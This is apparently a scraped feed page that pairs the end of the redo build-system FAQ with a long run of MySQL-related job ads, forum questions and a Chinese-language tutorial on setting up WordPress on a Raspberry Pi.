I'm sure it's doable, however. One nice thing about redo is that the source code is so small compared to make: you can just rewrite it.

Can I convince a sub-redo or sub-make to not use parallel builds?

Yes. Put this in your .do script:

unset MAKEFLAGS

The child makes will then not have access to the jobserver, so will build serially instead.

How fast is redo compared to make?

FIXME: The current version of redo is written in python and has not been optimized. So right now, it's usually a bit slower. Not too embarrassingly slower, though, and the slowness mostly only strikes when you're building a project from scratch.

For incrementally building only the changed parts of the project, redo can be much faster than make, because it can check all the dependencies up front and doesn't need to repeatedly parse and re-parse the Makefile (as recursive make needs to do).

redo's sqlite3-based dependency database is very fast (and it would be even faster if we rewrite redo in C instead of python). Better still, it would be possible to write an inotify daemon that can update the dependency database in real time; if you're running the daemon, you can run 'redo' from the toplevel and if your build is clean, it could return instantly, no matter how many dependencies you have.

On my machine, redo can currently check about 10,000 dependencies per second. As an example, a program that depends on every single .c or .h file in the linux kernel 2.6.36 repo (about 36000 files) can be checked in about 4 seconds.

Rewritten in C, dependency checking would probably go about 10 times faster still.

This probably isn't too hard; the design of redo is so simple that it should be easy to write in any language. It's just even easier in python, which was good for writing the prototype and debugging the parallelism and locking rules.

Most of the slowness at the moment is because redo-ifchange (and also sh itself) need to be fork'd and exec'd over and over during the build process.

As a point of reference, on my computer, I can fork-exec redo-ifchange.py about 87 times per second; an empty python program, about 100 times per second; an empty C program, about 1000 times per second; an empty make, about 300 times per second. So if I could compile 87 files per second with gcc, which I can't because gcc is slower than that, then python overhead would be 50%. Since gcc is slower than that, python overhead is generally much less - more like 10%.

Also, if you're using redo -j on a multicore machine, all the python forking happens in parallel with everything else, so that's 87 per second per core. Nevertheless, that's still slower than make and should be fixed.

(On the other hand, all this measurement is confounded because redo's more fine-grained dependencies mean you can have more parallelism. So if you have a lot of CPU cores, redo might build faster than make just because it makes better use of them.)

The output of 'ps ax' is ugly because of the python interpreter!

If the setproctitle module is installed, redo will use it in its script to clean up the displayed title. The module is also available in many distributions. A ps xf output would look like:

... 23461 pts/21 T 0:00 \_ make test 23462 pts/21 T 0:00 | \_ redo test 23463 pts/21 T 0:00 | \_ sh -e test.do test test test.redo2.tmp 23464 pts/21 T 0:00 | \_ redo-ifchange _all 23465 pts/21 T 0:00 | \_ sh -e _all.do _all _all _all.redo2.tmp ... Are there examples?

FIXME: There are some limited ones in the t/example/ subdir of the redo project. The best example is a real, live program using redo as a build process. If you switch your program's build process to use redo, please let us know and we can link to it here.

Please don't take the other tests in t/ as serious examples. Many of them are doing things in deliberately psychotic ways in order to stress redo's code and find bugs.

What's missing? How can I help?

redo is incomplete and probably has numerous bugs. Just what you always wanted in a build system, I know.

What's missing? Search for the word FIXME in this document; anything with a FIXME is something that is either not implemented, or which needs discussion, feedback, or ideas. Of course, there are surely other undocumented things that need discussion or fixes too.

You should join the redo-list@googlegroups.com mailing list.

You can find the mailing list archives here:

http://groups.google.com/group/redo-list

Yes, it might not look like it, but you can subscribe without having a Google Account. Just send a message here:

redo-list+subscribe@googlegroups.com

You can also send a message directly to the mailing list without subscribing first. If you reply to someone on the list, please leave them in the cc: list, since if they haven't subscribed, they won't get your reply otherwise. Nowadays everybody uses a mailer that removes duplicates, so don't worry about sending the same thing to them twice.

Note the plus sign.

Have fun,

Avery


          Wordpress developer      Cache   Translate Page      
WordPress Development o Category and Theme Customization o Customizing Page Template o Custom Plugin Development Thorough knowledge of PHP MySQL Good ability CSS three JavaScript / jQuery WordPress Admin ReactJS or AngularJS For more information: https://jobs-search.org/architecture-construction/wordpress-developer-wanted-in-pune-maharashtra_i664902
          Php developer      Cache   Translate Page      
3 -5yrs of relevant background Excellent Knowledge of PHP web frameworks such as Yii/ Laravel Understanding of MVC design patterns Good understanding of front-end technologies, such as JavaScript, HTML5, and CSS3, bootstrap Knowledge of object oriented PHP programming Thorough knowledge of MySQL Database. Must have hands on background of writing Stored procedures / triggers/ functions. Good...
          Dba and data analytics      Cache   Translate Page      
Required Skill Sound understanding of Database technologies Proficiency in MySQL, NoSQL, Hadoop Strong Data understanding Expertise to write robust, scalable, clean, maintainable and standard code. Application performance Background with Database design Hadoop, Apache Spark, Python Development Tools Defining consistent data architecture and data model Responsibilities Can work unaided Strong...
          Urgent requirement for node js developer pune location in mnc      Cache   Translate Page      
(For initial period of 3 mnths) Job classification 3rd Party Payroll Position Node Js Developer Background 2+ Years Location Viman Nagar (Pune) Primary Skills Backend Nodejs, express.js, meteor.js, sails.js Database NoSQL, MongoDB, MySQL, SQLite Frontend Responsive design, LESS, SaSS, html5, css3, jQuery, bootstrap 3-4 Single Page Application angularjs, reactjs Javascript libraries socket.io,...
          Drupal 8 developer      Cache   Translate Page      
Knowledge of Angular JS, Linux would be an advantage Technical prerequisites PHP, Mysql, OOPs, Jquery, HTML, CSS knowldge is must Knowledge of CMS (Drupal 7, Drupal eight /Typo 3 / WordPress / Joomla For more info: https://jobs-search.org/architecture-construction/drupal-8-developer-wanted-in-pune-maharashtra_i683272
          Php developer      Cache   Translate Page      
Skills we are looking for Background Applicant from 1-2 years - Proficiency in PHP, JavaScript, Jquery, JS libraries , MySQL ,HTML, CSS, Ajax, Boot Strap. - Knowledge of MVC architecture. - Background with RESTful APIs. - Current knowledge of Android/ Ionic framework is a plus. - Prior background in BFSI is a definite plus. Responsibilities and Duties - Hands on with Apache including...
          JR. PHP DEVELOPER - Tenet Systems - Shrirampur, West Bengal      Cache   Translate Page      
Experience: 0-3 yrs Skill: Sound in algorithm Core or Custom Development in either of – PHP, MySQL, JavaScript, AJAX And/or Knowing different other...
From Tenet Systems - Sun, 30 Sep 2018 05:14:16 GMT - View all Shrirampur, West Bengal jobs
          Junior Database Administrator - University of Saskatchewan - Saskatoon, SK      Cache   Translate Page      
PostgreSQL, MySQL, SQL Server, Oracle. The salary range, based on 1.0 FTE, is CAD $48,334.00 - 75,523.00 per annum (Information Technology/Phase 1).... $48,334 - $75,523 a year
From University of Saskatchewan - Wed, 31 Oct 2018 00:18:52 GMT - View all Saskatoon, SK jobs
          Adriod Developer - vikas Global Solutions Ltd - Madhavanpark, Karnataka      Cache   Translate Page      
Android Application Development, Android SDK’s, API, HTML,CSS, MYSQL. Android Application Development. Vikas Global Solutions Ltd....
From Indeed - Mon, 10 Sep 2018 05:26:38 GMT - View all Madhavanpark, Karnataka jobs
          (IT) DataStage Developer - ETL Datastage Developer based in London      Cache   Translate Page      

Rate: £450 - £550 Per Day Umbrella Basis ONLY   Location: London EC4V 6BJ   

DataStage Developer - ETL Datastage Developer based in London My well known Higher Educational client based in Central London is seeking a dynamic, hands on and technically astute IBM Infosphere Data Specialist/Senior ETL Developer, Support & Administrator to lead the design, development and management of reusable, metadata driven, extracts and transformations, using Infosphere Datastage. Main skill set needed is strong Datastage Development. The IBM Infosphere Data Specialist will also lead on the design, development and support for the end to end life cycle of a reusable ETL framework suite and sub components to support batch and Real Time data processing on Information Server and Change Data Delivery platforms Must have skills and experience for the ideal Datastage Developer, Support and Administrator are as follows:.Ability to work closely with the Infrastructure team and source system DBAs to lead on setup of CDD requirements..Lead on support of the installation, configuration and maintenance of CDC components on various Oracle, SQL and MySQL environments..Extensive experience in developing a reusable development suite for creating and maintaining subscriptions based on external metadata..Lead on design and development of replication flows to achieve high throughput and low latency, guaranteed delivery with near zero downtime..Perform Initial data refresh, supporting environment provisioning and build..Data synchronization of Non production environments..Support the test team in building test harness to simulate production like changes to facilitate transaction life cycle testing..Ensure the business and technical requirements are validated, standardized and mastered up to date..Work closely with Business Analysts, System Analysts and Data Modellers to analyse Datamodels and mapping specifications..Lead on the design and development of the ETL components that constitute the overall framework and any bespoke ETL code..Support the end to end life cycle of ETL delivery in an agile fashion. Technical skills:.Must have in depth IBM Infosphere Change Data Capture knowledge and experience with expertise on high volume batch and low latency Real Time data processing..Must have experience in CDC CLI, Java, Datastage BASIC, programming with Information Server APIs..Experience in using Java user exits and knowledge on the CDC Java API..Must have Unix Shell Scripting and Oracle programming skills..Must have good IBM Infosphere Server 11.3.1 knowledge and experience with expertise on high volume batch and low latency Real Time data processing..Must have good experience in Datastage BASIC, C++ for developing parallel engine components, programming with Information Server APIs..Must have Unix Shell Scripting and Oracle programming skills, dimensional modelling knowledge..Experience in Change Data Delivery implementations..Must have proven knowledge and experience in delivering reusable replication framework..Proactively replace manual processes with
 
Rate: £450 - £550 Per Day Umbrella Basis ONLY
Type: Contract
Location: London EC4V 6BJ
Country: UK
Contact: Vincent Galea
Advertiser: Nationwide People Ltd
Email: Vincent.Galea.8BF57.BEA7B@apps.jobserve.com
Start Date: ASAP
Reference: JSVG/ETL/GP/

          Database AWS Engineer (Canton, OH)      Cache   Translate Page      

The Database AWS Engineer is responsible for supporting our Patriot Software organization.  Our systems are currently in SQL Server hosted in multiple Amazon Web Services (AWS) RDS instances but are looking to change the mix with a focus on the cloud and open source.

To be successful in this position, you will not only need to have command of traditional database technologies and associated administration work but will also need to have the proven ability and desire to learn new technologies, such as AWS and services that the organization will potentially utilize.
 

Responsibilities

  • Help develop sustainable data-driven solutions with current database technologies to meet the needs of our organization and business customers
  • Ability to grasp/master new technologies rapidly as needed to progress varied initiatives
  • Able to break down complex data issues and resolve them
  • Builds robust systems with an eye on the long-term maintenance and support of the application
  • Helps drive cross-team design and influencing/development via technical leadership/mentoring
  • Influence cross team/matrix organization
  • Broader knowledge sharing
  • Provide technical guidance to team members
  • Understands complex multi-tier, multi-platform systems

Basic Qualifications

  • At least 3 years of experience in configuring, managing, and troubleshooting SQL Server
  • At least 3 years of experience with database backup and recovery, including implementing disaster recovery standards
  • At least 2 years of experience in AWS cloud computing platform migrating databases to Amazon RDS & EC2
  • At least 3 years of experience with database design, optimization, and tuning
  • At least 2 years of experience using Github
  • At least 2 years of experience in continuous integration and development methodologies tools

Preferred Qualifications

  • Bachelor’s degree in Computer Science or related discipline
  • 2+ years of experience in an Agile development environment
  • Experience translating business requirements to an IT solution.
  • 3+ years of experience in AWS cloud computing platform migrating databases (SQL Server) to Amazon RDS & EC2
  • Experience with Postgres and/or MySQL is a plus.

          PHP Function to change Background of images and store to server .      Cache   Translate Page      
Need a PHP Function to change the Background of images from green to white. Need to have some tolerance. Take a look at the sample images. Well documented code and explanation of how to implement on... (Budget: $10 - $30 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          PHP Function to change Background of images and store to server .      Cache   Translate Page      
Need a PHP Function to change the Background of images from green to white. Need to have some tolerance. Take a look at the sample images. Well documented code and explanation of how to implement on... (Budget: $10 - $30 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Empty export      Cache   Translate Page      

Replies: 0

Hi, i tried to export the orders but i got a empty csv file. I tried it two times. The file is 0Kb and can not be imported.

What could it be?

Status:
Versie van WooCommerce: 3.4.5
Versie van WordPress: 4.9.8
WordPress geheugenlimiet: 256 MB

Server
Serverinfore: Apache/2
PHP-versie: 7.1.21
PHP post max size: 8 MB
PHP time limit: 30
PHP max input vars: 1000
cURL Versie: 7.60.0, OpenSSL/1.0.2k
MySQL-versie: 10.1.34-MariaDB
Max upload size: 8 MB


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Autenticando Squid utilizando MySQL      Cache   Translate Page      

Será descrito como fazer o usuário do Squid autenticar com o MySQL usando MD5 e o basic_db_auth.


          如何在树莓派上搭建 WordPress      Cache   Translate Page      

这篇简单的教程可以让你在树莓派上运行你的 WordPress 网站。

WordPress 是一个非常受欢迎的开源博客平台和内容管理平台(CMS)。它很容易搭建,而且还有一个活跃的开发者社区构建网站、创建主题和插件供其他人使用。

虽然通过一键式 WordPress 设置获得托管包很容易,但也可以简单地通过命令行在 Linux 服务器上设置自己的托管包,而且树莓派是一种用来尝试它并顺便学习一些东西的相当好的途径。

一个经常使用的 Web 套件的四个部分是 Linux、Apache、MySQL 和 PHP。这里是你对它们每一个需要了解的。

Linux

树莓派上运行的系统是 Raspbian,这是一个基于 Debian,为运行在树莓派硬件上而优化的很好的 Linux 发行版。你有两个选择:桌面版或是精简版。桌面版有一个熟悉的桌面还有很多教育软件和编程工具,像是 LibreOffice 套件、Mincraft,还有一个 web 浏览器。精简版本没有桌面环境,因此它只有命令行以及一些必要的软件。

这篇教程在两个版本上都可以使用,但是如果你使用的是精简版,你必须要有另外一台电脑去访问你的站点。

Apache

Apache 是一个受欢迎的 web 服务器应用,你可以安装在你的树莓派上伺服你的 web 页面。就其自身而言,Apache 可以通过 HTTP 提供静态 HTML 文件。使用额外的模块,它也可以使用像是 PHP 的脚本语言提供动态网页。

安装 Apache 非常简单。打开一个终端窗口,然后输入下面的命令:

sudo apt install apache2 -y

Apache 默认放了一个测试文件在一个 web 目录中,你可以从你的电脑或是你网络中的其他计算机进行访问。只需要打开 web 浏览器,然后输入地址 <http://localhost>。或者(特别是你使用的是 Raspbian Lite 的话)输入你的树莓派的 IP 地址代替 localhost。你应该会在你的浏览器窗口中看到这样的内容:

这意味着你的 Apache 已经开始工作了!

这个默认的网页仅仅是你文件系统里的一个文件。它在你本地的 /var/www/html/index/html。你可以使用 Leafpad 文本编辑器写一些 HTML 去替换这个文件的内容。

cd /var/www/html/
sudo leafpad index.html

保存并关闭 Leafpad 然后刷新网页,查看你的更改。

MySQL

MySQL(读作 “my S-Q-L” 或者 “my sequel”)是一个很受欢迎的数据库引擎。就像 PHP,它被非常广泛的应用于网页服务,这也是为什么像 WordPress 一样的项目选择了它,以及这些项目是为何如此受欢迎。

在一个终端窗口中输入以下命令安装 MySQL 服务(LCTT 译注:实际上安装的是 MySQL 分支 MariaDB):

sudo apt-get install mysql-server -y

WordPress 使用 MySQL 存储文章、页面、用户数据、还有许多其他的内容。

PHP

PHP 是一个预处理器:它是在服务器通过网络浏览器接受网页请求是运行的代码。它解决那些需要展示在网页上的内容,然后发送这些网页到浏览器上。不像静态的 HTML,PHP 能在不同的情况下展示不同的内容。PHP 是一个在 web 上非常受欢迎的语言;很多像 Facebook 和 Wikipedia 的项目都使用 PHP 编写。

安装 PHP 和 MySQL 的插件:

sudo apt-get install php php-mysql -y

删除 index.html,然后创建 index.php

sudo rm index.html
sudo leafpad index.php

在里面添加以下内容:

<?php phpinfo(); ?>

保存、退出、刷新你的网页。你将会看到 PHP 状态页:

WordPress

你可以使用 wget 命令从 wordpress.org 下载 WordPress。最新的 WordPress 总是使用 wordpress.org/latest.tar.gz 这个网址,所以你可以直接抓取这些文件,而无需到网页里面查看,现在的版本是 4.9.8。

确保你在 /var/www/html 目录中,然后删除里面的所有内容:

cd /var/www/html/
sudo rm *

使用 wget 下载 WordPress,然后提取里面的内容,并移动提取的 WordPress 目录中的内容移动到 html 目录下:

sudo wget http://wordpress.org/latest.tar.gz
sudo tar xzf latest.tar.gz
sudo mv wordpress/* .

现在可以删除压缩包和空的 wordpress 目录了:

sudo rm -rf wordpress latest.tar.gz

运行 ls 或者 tree -L 1 命令显示 WordPress 项目下包含的内容:

.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php

3 directories, 16 files

这是 WordPress 的默认安装源。在 wp-content 目录中,你可以编辑你的自定义安装。

你现在应该把所有文件的所有权改为 Apache 的运行用户 www-data

sudo chown -R www-data: .

WordPress 数据库

为了搭建你的 WordPress 站点,你需要一个数据库。这里使用的是 MySQL。

在终端窗口运行 MySQL 的安全安装命令:

sudo mysql_secure_installation

你将会被问到一系列的问题。这里原来没有设置密码,但是在下一步你应该设置一个。确保你记住了你输入的密码,后面你需要使用它去连接你的 WordPress。按回车确认下面的所有问题。

当它完成之后,你将会看到 “All done!” 和 “Thanks for using MariaDB!” 的信息。

在终端窗口运行 mysql 命令:

sudo mysql -uroot -p

输入你创建的 root 密码(LCTT 译注:不是 Linux 系统的 root 密码,是 MySQL 的 root 密码)。你将看到 “Welcome to the MariaDB monitor.” 的欢迎信息。在 “MariaDB [(none)] >” 提示处使用以下命令,为你 WordPress 的安装创建一个数据库:

create database wordpress;

注意声明最后的分号,如果命令执行成功,你将看到下面的提示:

Query OK, 1 row affected (0.00 sec)

把数据库权限交给 root 用户在声明的底部输入密码:

GRANT ALL PRIVILEGES ON wordpress.* TO 'root'@'localhost' IDENTIFIED BY 'YOURPASSWORD';

为了让更改生效,你需要刷新数据库权限:

FLUSH PRIVILEGES;

Ctrl+D 退出 MariaDB 提示符,返回到 Bash shell。

WordPress 配置

在你的 树莓派 打开网页浏览器,地址栏输入 http://localhost。选择一个你想要在 WordPress 使用的语言,然后点击“Continue”。你将会看到 WordPress 的欢迎界面。点击 “Let’s go!” 按钮。

按照下面这样填写基本的站点信息:

Database Name:      wordpress
User Name:          root
Password:           <YOUR PASSWORD>
Database Host:      localhost
Table Prefix:       wp_

点击 “Submit” 继续,然后点击 “Run the install”。

按下面的格式填写:为你的站点设置一个标题、创建一个用户名和密码、输入你的 email 地址。点击 “Install WordPress” 按钮,然后使用你刚刚创建的账号登录,你现在已经登录,而且你的站点已经设置好了,你可以在浏览器地址栏输入 http://localhost/wp-admin 查看你的网站。

永久链接

更改你的永久链接设置,使得你的 URL 更加友好是一个很好的想法。

要这样做,首先登录你的 WordPress ,进入仪表盘。进入 “Settings”,&ldquoermalinks”。选择 &ldquoost name” 选项,然后点击 “Save Changes”。接着你需要开启 Apache 的 rewrite 模块。

sudo a2enmod rewrite

你还需要告诉虚拟托管服务,站点允许改写请求。为你的虚拟主机编辑 Apache 配置文件:

sudo leafpad /etc/apache2/sites-available/000-default.conf

在第一行后添加下面的内容:

<Directory "/var/www/html">
    AllowOverride All
</Directory>

确保其中有像这样的内容 <VirtualHost *:80>

<VirtualHost *:80>
    <Directory "/var/www/html">
        AllowOverride All
    </Directory>
    ...

保存这个文件,然后退出,重启 Apache:

sudo systemctl restart apache2

下一步?

WordPress 是可以高度自定义的。在网站顶部横幅处点击你的站点名,你就会进入仪表盘。在这里你可以修改主题、添加页面和文章、编辑菜单、添加插件、以及许多其他的事情。

这里有一些你可以在树莓派的网页服务上尝试的有趣的事情:

  • 添加页面和文章到你的网站
  • 从外观菜单安装不同的主题
  • 自定义你的网站主题或是创建你自己的
  • 使用你的网站服务向你的网络上的其他人显示有用的信息

不要忘记,树莓派是一台 Linux 电脑。你也可以使用相同的结构在运行着 Debian 或者 Ubuntu 的服务器上安装 WordPress。


via: https://opensource.com/article/18/10/setting-wordpress-raspberry-pi

作者:Ben Nuttall 选题:lujun9972 译者:dianbanjiu 校对:wxy

本文由 LCTT 原创编译,Linux中国 荣誉推出


          Серверное применение Linux      Cache   Translate Page      
Серверное применение Linux

Серверное применение Linux - Описана настройка различных типов серверов: Web-, FTP-, DNS-, DHCP-, почтового сервера, сервера баз данных. Подробно рассмотрена установка и базовая настройка операционной системы, настройка связки Apache + MySQL + PHP, дано общее устройство Linux и разобраны основные принципы работы с этой операционной системой.
          My Slides about MySQL 8.0 Performance from #OOW18 and #PerconaLIVE 2018      Cache   Translate Page      

As promised, here are slides about MySQL 8.0 Performance from my talks at Oracle Open World 2018 and Percona LIVE Europe 2018 -- all is combined into a single PDF file to give you an overall summary about what we already completed, where we're going in the next updates within our "continuous release", and what kind of performance issues we're digging right now.. ;-))

Also, I'd like to say that both Conferences were simply awesome, and it's great to see a constantly growing level of skills of all MySQL Users attending these Conferences ! -- hope you'll have even more fun with MySQL 8.0 now ;-))


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          VueJs-Mid Level Developer-WV - Core10 - Huntington, WV      Cache   Translate Page      
Experience with other database technologies (postgresql, mysql, mssql, mongodb). The Mid Developer is responsible for working as part of a collaborative...
From Core10 - Mon, 15 Oct 2018 05:46:30 GMT - View all Huntington, WV jobs
          NodeJs-Mid Level Developer-WV - Core10 - Huntington, WV      Cache   Translate Page      
Experience with other database technologies (postgresql, mysql, mssql, mongodb). The Mid Developer is responsible for working as part of a collaborative...
From Core10 - Mon, 15 Oct 2018 05:46:19 GMT - View all Huntington, WV jobs
          Senior Software Engineer - KOHLS - Menomonee Falls, WI      Cache   Translate Page      
MongoDB, Cassandra, Couchbase, Oracle and/or MySQL. Company Overview At Kohl’s, we’re always looking ahead to creating the next great thing....
From Kohl's - Tue, 30 Oct 2018 20:55:02 GMT - View all Menomonee Falls, WI jobs
          Sr Database Administrator - KOHLS - Menomonee Falls, WI      Cache   Translate Page      
Golden Gate MySql 5.7 MongoDB. Sr Database Administrator POSITION OBJECTIVE Plans and executes the design, development, implementation, integration and support...
From Kohl's - Thu, 04 Oct 2018 23:09:17 GMT - View all Menomonee Falls, WI jobs
          Mid-Senior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page      
Database technologies like MySQL, Oracle, PostgreSQL, MongoDB,. Mid-level Full Stack Web Developer....
From Education Analytics - Fri, 02 Nov 2018 23:31:08 GMT - View all Madison, WI jobs
          Summer Intern Developers - Back End - Avid Ratings - Madison, WI      Cache   Translate Page      
MySQL, MongoDB, Cassandra, Redis, etc…). The right candidate should cherish experimentation and exploration with new technologies, while at the same time...
From Avid Ratings - Fri, 05 Oct 2018 00:14:43 GMT - View all Madison, WI jobs
          mysql deadlock and saving data after a few hours      Cache   Translate Page      
Hello,
...
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          import and export woocommerce products completly      Cache   Translate Page      
I want to import woo products from a website and export to another website. I tried some plugins, but not completed well. My product has custom fields by function and by ACF(Pro and Table). I'm using clever swatch plugin, so I need to make same setting for each product by export/import... (Budget: $30 - $250 USD, Jobs: MySQL, PHP, WooCommerce, WordPress)
           Last access of a DB in Mysql      Cache   Translate Page      

@kostastsirigos wrote:

I have “inherited” a collection of Mysql DBs (~900) and I would like to know which of them are actually being used. I looked around and I can find some commands like:

SELECT from_unixtime(UNIX_TIMESTAMP(MAX(UPDATE_TIME))) as last_update FROM information_schema.tables WHERE TABLE_SCHEMA='MY_DB' GROUP BY TABLE_SCHEMA;

but this does not really tell me if MY_DB is being accessed by some web service or users, right? It only informs about when it was last updated, unless I got it wrong. If so, is there a more accurate way to find out the last access of a DB?

Thank you!

Posts: 1

Participants: 1

Read full topic


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          How can I improve rand()...rand() too slow      Cache   Translate Page      

@aosworks wrote:

Good Day,

Am trying to improve rand() method in my Mysql syntax because rand() is too slow but am facing some issue with the right syntax to use… below is the sql

$sql= "SELECT artist_username,artist_bizname,artist_city,artist_state,artist_country,members_signup.profile_photo 
FROM artists INNER JOIN members_signup ON artists.artist_username = members_signup.user_name
WHERE artists_id >= (SELECT FLOOR( MAX(artists_id) * RAND()) FROM `artists` 
MATCH(artist_str) AGAINST(:phrase) OR
MATCH(artist_city) AGAINST(:phrase) OR
MATCH(artist_state) AGAINST(:phrase) OR
MATCH(artist_country) AGAINST(:phrase) OR
MATCH(artist_username) AGAINST(:phrase) 
)ORDER BY artists_id";
$s = $pdo->prepare($sql);
$s->bindValue(":phrase", $srhArtistVal);
$s->execute();

each time I get syntax error message

check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘MATCH() AGAINST(’) OR MATCH() AGAINST( at line 4 in

Posts: 3

Participants: 2

Read full topic


          import and export woocommerce products completly      Cache   Translate Page      
I want to import woo products from a website and export to another website. I tried some plugins, but not completed well. My product has custom fields by function and by ACF(Pro and Table). I'm using clever swatch plugin, so I need to make same setting for each product by export/import... (Budget: $30 - $250 USD, Jobs: MySQL, PHP, WooCommerce, WordPress)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Full Stack JavaScript Developer      Cache   Translate Page      

Are you a JavaScript Developer looking for an exciting new challenge and the opportunity to learn more about cyber security?  Our client, a leading education provider in London, has an opening for an experienced developer to join their team and contribute to the building of a new application security toolkit and management system.  No previous experience in the area of cyber security is required.

Key duties:

  • Work with cutting edge technologies on a global platform
  • Contribute to the design and direction of the system and support a team of specialists
  • Work in Javascript ES6 with Node.js in the server and React in the client and running in the Cloud
  • Project will include system integration, data analysis and correlation, reporting, scalability and scheduled, distributed, tool execution

Experience / skills required:

  • Good knowledge of Javascript / ES6 including use of classes
  • Knowledge of Node.JS / Express
  • A creative approach to application development and a desire to learn about Cyber Security
  • Experience of object oriented development
  • In depth knowledge of SQL and CSS
  • Experience of SQL Server, PostgreSQL, MySQL would be useful
  • Other desirable knowledge includes: React, Python, Git, Agile/Scrum, Jira

For further information, please apply online or email a CV and salary expectations to kelliemillar@atwoodtate.co.uk

Contact:             Kellie Millar

Tel:                    0203 574 4430

Applications ASAP, please

Atwood Tate embraces diversity and seeks to promote the benefits of diversity in all of our business activities and to develop a business culture that reflects that belief.  We welcome applications from all members of society irrespective of age, disability, sex, sexual orientation, colour, race, nationality, ethnic or national origin, religion or belief.

Reference: 
7423
Company: 
Location (from list): 
London, UK
Employment type: 
Full-time, Permanent
Type: 
IT
Job sector: 
Academic, Educational
Required skills: 
Javascript
Application email: 
Salary description: 
Available on request

          MySQL maintenance scheduled      Cache   Translate Page      
MySQL for Webserve,Other
Maintenance
Wed 11/7/2018 3:42 PM EST

          PHP5 and MySQL Bible      Cache   Translate Page      
none
          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          Cloud Software Engineer - JP Morgan Chase - Seattle, WA      Cache   Translate Page      
Design and implement automated deployment strategies that scale with the business. Knowledge in relational and NoSQL databases like MySQL, SQLServer, Oracle and...
From JPMorgan Chase - Tue, 06 Nov 2018 12:32:42 GMT - View all Seattle, WA jobs
          Java SDET      Cache   Translate Page      
DC-Washington DC, job summary: Randstad Technologies is looking for a Automation Engineer to join our client in Washington, DC! Job Description: •Develop, maintain and execute automated tests in Java. •Test APIs, associated databases (MongoDB, Cassandra or MySQL), and output inJSON and XML file feeds. •Create automated test plans and test cases •Evaluate test results to determine adherence to requirements and confo
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          [Freelancer] WooCommerce Back end developer      Cache   Translate Page      
From Freelancer // Will explain all details on the conversation. As we need someone who is familiar with WooCommerce tables. MySQL
          OroCommerce Customization      Cache   Translate Page      
